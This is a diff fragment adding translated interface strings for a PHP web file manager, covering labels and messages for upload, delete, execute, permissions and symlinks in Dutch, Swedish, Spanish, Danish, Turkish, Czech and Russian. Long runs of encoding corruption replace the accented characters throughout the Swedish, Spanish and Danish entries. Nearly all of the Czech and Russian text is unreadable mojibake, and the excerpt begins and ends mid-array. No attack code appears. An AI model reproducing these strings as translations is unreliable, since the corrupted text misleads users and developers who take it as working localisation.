+'not_readable' => '"[%1]" non pu����¯�¿�½������² essere letto.'
+		);
+
+	case 'nl':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'Bestand',
+'filename' => 'Bestandsnaam',
+
+'size' => 'Grootte',
+'permission' => 'Bevoegdheid',
+'owner' => 'Eigenaar',
+'group' => 'Groep',
+'other' => 'Anderen',
+'functions' => 'Functies',
+
+'read' => 'lezen',
+'write' => 'schrijven',
+'execute' => 'uitvoeren',
+
+'create_symlink' => 'maak symlink',
+'delete' => 'verwijderen',
+'rename' => 'hernoemen',
+'move' => 'verplaatsen',
+'copy' => 'kopieren',
+'edit' => 'bewerken',
+'download' => 'downloaden',
+'upload' => 'uploaden',
+'create' => 'aanmaken',
+'change' => 'veranderen',
+'save' => 'opslaan',
+'set' => 'instellen',
+'reset' => 'resetten',
+'relative' => 'Relatief pat naar doel',
+
+'yes' => 'Ja',
+'no' => 'Nee',
+'back' => 'terug',
+'destination' => 'Bestemming',
+'symlink' => 'Symlink',
+'no_output' => 'geen output',
+
+'user' => 'Gebruiker',
+'password' => 'Wachtwoord',
+'add' => 'toevoegen',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" is verstuurd.',
+'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
+'already_exists' => '"[%1]" bestaat al.',
+'created' => '"[%1]" is aangemaakt.',
+'not_created' => '"[%1]" kan niet worden aangemaakt.',
+'really_delete' => 'Deze bestanden verwijderen?',
+'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
+'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
+'rename_file' => 'Bestandsnaam veranderen:',
+'renamed' => '"[%1]" heet nu "[%2]".',
+'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
+'move_files' => 'Verplaats deze bestanden:',
+'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
+'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
+'copy_files' => 'Kopieer deze bestanden:',
+'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
+'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan niet worden bewerkt.',
+'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
+'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
+'saved' => '"[%1]" is opgeslagen.',
+'not_saved' => '"[%1]" is niet opgeslagen.',
+'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
+'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
+'permission_for' => 'Bevoegdheid voor "[%1]":',
+'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
+'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
+'not_readable' => '"[%1]" kan niet worden gelezen.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'S����¯�¿�½������¤kerhetsniv����¯�¿�½������¥',
+'owner' => '����¯�¿�½���¯���¿���½gare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'functions' => 'Funktioner',
+ 
+'read' => 'L����¯�¿�½������¤s',
+'write' => 'Skriv',
+'execute' => 'Utf����¯�¿�½������¶r',
+ 
+'create_symlink' => 'Skapa symlink',
+'delete' => 'Radera',
+'rename' => 'Byt namn',
+'move' => 'Flytta',
+'copy' => 'Kopiera',
+'edit' => '����¯�¿�½���¯���¿���½ndra',
+'download' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => '����¯�¿�½���¯���¿���½ndra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'T����¯�¿�½������¶m',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'Tillbaks',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Anv����¯�¿�½������¤ndare',
+'password' => 'L����¯�¿�½������¶senord',
+'add' => 'L����¯�¿�½������¤gg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_delete' => 'Radera dessa filer?',
+'deleted' => "De h����¯�¿�½������¤r filerna har raderats:\n[%1]",
+'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
+'rename_file' => 'Byt namn p����¯�¿�½������¥ fil:',
+'renamed' => '"[%1]" har bytt namn till "[%2]".',
+'not_renamed' => '"[%1] kunde inte d����¯�¿�½������¶pas om till "[%2]".',
+'move_files' => 'Flytta dessa filer:',
+'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'copy_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan inte ����¯�¿�½������¤ndras.',
+'executed' => "\"[%1]\" har utf����¯�¿�½������¶rts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utf����¯�¿�½������¶ras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink fr����¯�¿�½������¥n "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink fr����¯�¿�½������¥n "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'R����¯�¿�½������¤ttigheter f����¯�¿�½������¶r "[%1]":',
+'permission_set' => 'R����¯�¿�½������¤ttigheter f����¯�¿�½������¶r "[%1]" ����¯�¿�½������¤ndrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte l����¯�¿�½������¤sas.'
+		);
+
+	case 'es':
+
+		$date_format = 'j/n/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directorio',
+'file' => 'Archivo',
+'filename' => 'Nombre Archivo',
+
+'size' => 'Tama����¯�¿�½������±o',
+'permission' => 'Permisos',
+'owner' => 'Propietario',
+'group' => 'Grupo',
+'other' => 'Otros',
+'functions' => 'Funciones',
+
+'read' => 'lectura',
+'write' => 'escritura',
+'execute' => 'ejecuci����¯�¿�½������³n',
+
+'create_symlink' => 'crear enlace',
+'delete' => 'borrar',
+'rename' => 'renombrar',
+'move' => 'mover',
+'copy' => 'copiar',
+'edit' => 'editar',
+'download' => 'bajar',
+'upload' => 'subir',
+'create' => 'crear',
+'change' => 'cambiar',
+'save' => 'salvar',
+'set' => 'setear',
+'reset' => 'resetear',
+'relative' => 'Path relativo',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'atr����¯�¿�½������¡s',
+'destination' => 'Destino',
+'symlink' => 'Enlace',
+'no_output' => 'sin salida',
+
+'user' => 'Usuario',
+'password' => 'Clave',
+'add' => 'agregar',
+'add_basic_auth' => 'agregar autentificaci����¯�¿�½������³n b����¯�¿�½������¡sica',
+
+'uploaded' => '"[%1]" ha sido subido.',
+'not_uploaded' => '"[%1]" no pudo ser subido.',
+'already_exists' => '"[%1]" ya existe.',
+'created' => '"[%1]" ha sido creado.',
+'not_created' => '"[%1]" no pudo ser creado.',
+'really_delete' => '����¯�¿�½������¿Borra estos archivos?',
+'deleted' => "Estos archivos han sido borrados:\n[%1]",
+'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
+'rename_file' => 'Renombra archivo:',
+'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
+'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
+'move_files' => 'Mover estos archivos:',
+'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
+'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
+'copy_files' => 'Copiar estos archivos:',
+'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
+'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" no pudo ser editado.',
+'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
+'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
+'saved' => '"[%1]" ha sido salvado.',
+'not_saved' => '"[%1]" no pudo ser salvado.',
+'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
+'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
+'permission_for' => 'Permisos de "[%1]":',
+'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
+'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
+'not_readable' => '"[%1]" no pudo ser le����¯�¿�½������­do.'
+		);
+
+	case 'dk':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Mappe',
+'file' => 'Fil',
+'filename' => 'Filnavn',
+
+'size' => 'St����¯�¿�½������¸rrelse',
+'permission' => 'Rettighed',
+'owner' => 'Ejer',
+'group' => 'Gruppe',
+'other' => 'Andre',
+'functions' => 'Funktioner',
+
+'read' => 'l����¯�¿�½������¦s',
+'write' => 'skriv',
+'execute' => 'k����¯�¿�½������¸r',
+
+'create_symlink' => 'opret symbolsk link',
+'delete' => 'slet',
+'rename' => 'omd����¯�¿�½������¸b',
+'move' => 'flyt',
+'copy' => 'kopier',
+'edit' => 'rediger',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'opret',
+'change' => 'skift',
+'save' => 'gem',
+'set' => 's����¯�¿�½������¦t',
+'reset' => 'nulstil',
+'relative' => 'Relativ sti til valg',
+
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'tilbage',
+'destination' => 'Distination',
+'symlink' => 'Symbolsk link',
+'no_output' => 'ingen resultat',
+
+'user' => 'Bruger',
+'password' => 'Kodeord',
+'add' => 'tilf����¯�¿�½������¸j',
+'add_basic_auth' => 'tilf����¯�¿�½������¸j grundliggende rettigheder',
+
+'uploaded' => '"[%1]" er blevet uploaded.',
+'not_uploaded' => '"[%1]" kunnu ikke uploades.',
+'already_exists' => '"[%1]" findes allerede.',
+'created' => '"[%1]" er blevet oprettet.',
+'not_created' => '"[%1]" kunne ikke oprettes.',
+'really_delete' => 'Slet disse filer?',
+'deleted' => "Disse filer er blevet slettet:\n[%1]",
+'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
+'rename_file' => 'Omd����¯�¿�½������¸d fil:',
+'renamed' => '"[%1]" er blevet omd����¯�¿�½������¸bt til "[%2]".',
+'not_renamed' => '"[%1] kunne ikke omd����¯�¿�½������¸bes til "[%2]".',
+'move_files' => 'Flyt disse filer:',
+'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
+'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
+'copy_files' => 'Kopier disse filer:',
+'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
+'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan ikke redigeres.',
+'executed' => "\"[%1]\" er blevet k����¯�¿�½������¸rt korrekt:\n{%2}",
+'not_executed' => "\"[%1]\" kan ikke k����¯�¿�½������¸res korrekt:\n{%2}",
+'saved' => '"[%1]" er blevet gemt.',
+'not_saved' => '"[%1]" kunne ikke gemmes.',
+'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
+'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
+'permission_for' => 'Rettigheder for "[%1]":',
+'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
+'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke s����¯�¿�½������¦ttes til [%2].',
+'not_readable' => '"[%1]" Kan ikke l����¯�¿�½������¦ses.'
+		);
+
+	case 'tr':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Klasor',
+'file' => 'Dosya',
+'filename' => 'dosya adi',
+
+'size' => 'boyutu',
+'permission' => 'Izin',
+'owner' => 'sahib',
+'group' => 'Grup',
+'other' => 'Digerleri',
+'functions' => 'Fonksiyonlar',
+
+'read' => 'oku',
+'write' => 'yaz',
+'execute' => 'calistir',
+
+'create_symlink' => 'yarat symlink',
+'delete' => 'sil',
+'rename' => 'ad degistir',
+'move' => 'tasi',
+'copy' => 'kopyala',
+'edit' => 'duzenle',
+'download' => 'indir',
+'upload' => 'Yukle',
+'create' => 'create',
+'change' => 'degistir',
+'save' => 'kaydet',
+'set' => 'ayar',
+'reset' => 'sifirla',
+'relative' => 'Hedef yola gore',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'back' => 'Geri',
+'destination' => 'Hedef',
+'symlink' => 'Kisa yol',
+'no_output' => 'cikti yok',
+
+'user' => 'Kullanici',
+'password' => 'Sifre',
+'add' => 'ekle',
+'add_basic_auth' => 'ekle basit-authentification',
+
+'uploaded' => '"[%1]" yuklendi.',
+'not_uploaded' => '"[%1]" yuklenemedi.',
+'already_exists' => '"[%1]" kullanilmakta.',
+'created' => '"[%1]" olusturuldu.',
+'not_created' => '"[%1]" olusturulamadi.',
+'really_delete' => 'Bu dosyalar silinsin mi DOSTUM?',
+'deleted' => "Bu dosyalar silindi:\n[%1]",
+'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
+'rename_file' => 'Adi degisen dosya:',
+'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
+'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
+'move_files' => 'Tasinan dosyalar:',
+'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
+'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
+'copy_files' => 'Kopyalanan dosyalar:',
+'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
+'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" duzenlenemiyor.',
+'executed' => "\"[%1]\" Basariyla Calistirildi:\n{%2}",
+'not_executed' => "\"[%1]\" Calistirilamadi:\n{%2}",
+'saved' => '"[%1]" Kaydedildi.',
+'not_saved' => '"[%1]" kaydedilemedi.',
+'symlinked' => '"[%2]" den "[%1]" e kisayol olusturuldu.',
+'not_symlinked' => '"[%2]"den "[%1]" e kisayol olusturulamadi.',
+'permission_for' => 'Izinler "[%1]":',
+'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
+'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
+'not_readable' => '"[%1]" okunamiyor.'
+		);
+
+	case 'cs':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'UTF-8';
+
+		return array(
+'directory' => 'Adres����¯�¿�½���¯���¿���½����¯�¿�½������¡����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'file' => 'Soubor',
+'filename' => 'Jm����¯�¿�½���¯���¿���½����¯�¿�½������©no souboru',
+
+'size' => 'Velikost',
+'permission' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va',
+'owner' => 'Vlastn����¯�¿�½���¯���¿���½����¯�¿�½������­k',
+'group' => 'Skupina',
+'other' => 'Ostatn����¯�¿�½���¯���¿���½����¯�¿�½������­',
+'functions' => 'Funkce',
+
+'read' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ten����¯�¿�½���¯���¿���½����¯�¿�½������­',
+'write' => 'Z����¯�¿�½���¯���¿���½����¯�¿�½������¡pis',
+'execute' => 'Spou����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½������­',
+
+'create_symlink' => 'Vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½it symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz',
+'delete' => 'Smazat',
+'rename' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenovat',
+'move' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½esunout',
+'copy' => 'Zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rovat',
+'edit' => 'Otev����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½������­t',
+'download' => 'St����¯�¿�½���¯���¿���½����¯�¿�½������¡hnout',
+'upload' => 'Nahraj na server',
+'create' => 'Vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½it',
+'change' => 'Zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½nit',
+'save' => 'Ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸it',
+'set' => 'Nastavit',
+'reset' => 'zp����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t',
+'relative' => 'Relatif',
+
+'yes' => 'Ano',
+'no' => 'Ne',
+'back' => 'Zp����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t',
+'destination' => 'Destination',
+'symlink' => 'Symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz',
+'no_output' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡zdn����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ v����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½stup',
+
+'user' => 'U����¯�¿�½���¯���¿���½����¯�¿�½������¸ivatel',
+'password' => 'Heslo',
+'add' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½idat',
+'add_basic_auth' => 'p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½idej z����¯�¿�½���¯���¿���½����¯�¿�½������¡kladn����¯�¿�½���¯���¿���½����¯�¿�½������­ autentizaci',
+
+'uploaded' => 'Soubor "[%1]" byl nahr����¯�¿�½���¯���¿���½����¯�¿�½������¡n na server.',
+'not_uploaded' => 'Soubor "[%1]" nebyl nahr����¯�¿�½���¯���¿���½����¯�¿�½������¡n na server.',
+'already_exists' => 'Soubor "[%1]" u����¯�¿�½���¯���¿���½����¯�¿�½������¸ exituje.',
+'created' => 'Soubor "[%1]" byl vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
+'not_created' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t  vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
+'really_delete' => 'Vymazat soubor?',
+'deleted' => "Byly vymaz����¯�¿�½���¯���¿���½����¯�¿�½������¡ny tyto soubory:\n[%1]",
+'not_deleted' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½eny:\n[%1]",
+'rename_file' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenuj soubory:',
+'renamed' => 'Soubor "[%1]" byl p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenov����¯�¿�½���¯���¿���½����¯�¿�½������¡n na "[%2]".',
+'not_renamed' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ejmenov����¯�¿�½���¯���¿���½����¯�¿�½������¡n na "[%2]".',
+'move_files' => 'P����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­stit tyto soubory:',
+'moved' => "Tyto soubory byly p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­st����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ny do \"[%2]\":\n[%1]",
+'not_moved' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½em����¯�¿�½���¯���¿���½����¯�¿�½������­st����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ny do \"[%2]\":\n[%1]",
+'copy_files' => 'Zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rovat tyto soubory:',
+'copied' => "Tyto soubory byly zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rov����¯�¿�½���¯���¿���½����¯�¿�½������¡ny do \"[%2]\":\n[%1]",
+'not_copied' => "Tyto soubory nemohly b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t zkop����¯�¿�½���¯���¿���½����¯�¿�½������­rov����¯�¿�½���¯���¿���½����¯�¿�½������¡ny do \"[%2]\":\n[%1]",
+'not_edited' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t otev����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
+'executed' => "SOubor \"[%1]\" byl spu����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n :\n{%2}",
+'not_executed' => "Soubor \"[%1]\" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t spu����¯�¿�½���¯���¿���½����¯�¿�½������¡t����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n:\n{%2}",
+'saved' => 'Soubor "[%1]" byl ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸en.',
+'not_saved' => 'Soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t ulo����¯�¿�½���¯���¿���½����¯�¿�½������¸en.',
+'symlinked' => 'Byl vyvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz "[%2]" na soubor "[%1]".',
+'not_symlinked' => 'Symbolick����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ odkaz "[%2]" na soubor "[%1]" nemohl b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t vytvo����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½en.',
+'permission_for' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]":',
+'permission_set' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]" byla zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½na na [%2].',
+'permission_not_set' => 'Pr����¯�¿�½���¯���¿���½����¯�¿�½������¡va k "[%1]" nemohla b����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½t zm����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½n����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½na na [%2].',
+'not_readable' => 'Soubor "[%1]" nen����¯�¿�½���¯���¿���½����¯�¿�½������­ mo����¯�¿�½���¯���¿���½����¯�¿�½������¸no p����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½e����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½������­st.'
+		);
+
+	case 'ru':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'KOI8-R';
+        
+		return array(
+'directory' => '����¯�¿�½������«����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'file' => '����¯�¿�½������¦����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'filename' => '����¯�¿�½������©����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+
+'size' => '����¯�¿�½������²����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'permission' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'owner' => '����¯�¿�½������¨����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'group' => '����¯�¿�½������§����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'other' => '����¯�¿�½������¤����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'functions' => '����¯�¿�½������¦����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+
+'read' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'write' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'execute' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+
+'create_symlink' => '����¯�¿�½������³����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'delete' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'rename' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'move' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'copy' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'edit' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'download' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'upload' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
+'create' => '����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½',
